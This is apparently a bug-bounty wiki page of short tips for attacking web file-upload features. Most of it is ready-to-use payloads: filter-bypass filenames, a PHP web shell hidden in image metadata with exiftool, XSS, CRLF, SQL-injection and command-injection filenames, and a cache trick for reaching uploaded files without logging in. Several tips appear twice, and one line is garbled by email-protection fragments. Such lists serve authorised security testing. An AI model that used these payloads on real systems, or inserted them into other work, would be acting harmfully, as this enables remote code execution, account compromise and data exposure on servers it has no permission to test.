File Upload

​#BugBountyProTip Some caching servers would cache files larger than 2mb. if app accepts file upload, then upload a large file and access it #multiple times while logged-in. It will be cached. Then access it without login, and pingo! unauthenticated access to sensitive files!​
​Uploader Vuln:
Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx"
Content-Type: image/jpeg
Res:
{"StoreHousePicture_File":"test.aspx","Success":true}#BugBounty​
​https://anotherhackerblog.com/exploiting-file-uploads-pt1/​
​https://anotherhackerblog.com/exploiting-file-uploads-pt-2/​
Payloads - https://github.com/1N3/IntruderPayloads/tree/master/Uploads​
​Bypassing most FILE Uploads filters for $$$$ * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #​BugBounty​
Bypass File Upload Filtering In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips​
​Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.​
​#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png​
​Bypassing most FILE Uploads filters for $$$$ * .htaccess <- upload htaccess * file.svg <- uploading svg = xss * file.SVg <- must try case mismatch * file.png.svg * file.php%00.png * file.png' or '1'='1 * ../../file.png * file.'svg <- invalid ext. #bugbountytips #​BugBounty​
​#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so: <img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png​
​Bypass File Upload Filtering In image : exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg mv shell.jpg shell.php.jpg #bugbountytip #bugbountytips​
​#Bugbountytip Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.​
​bypassing file content restrictions: in some cases you can do a crlf injection via filename x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script> this will cause Content-Disposition to throw its content into the file #bugbounty #xss #crlfinjection #bugbountytip​
​[email protected]: [email protected]: [email protected]: [email protected]: If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE. #BugBounty #BugBountyTips #InfoSec​
​
​Chaining file uploads with other vulns:-
​
Chaining file uploads with other vulns:-
​
 Set filename to:- 
​
> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections
Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter.
Email Related
Open Redirect
Last modified 2yr ago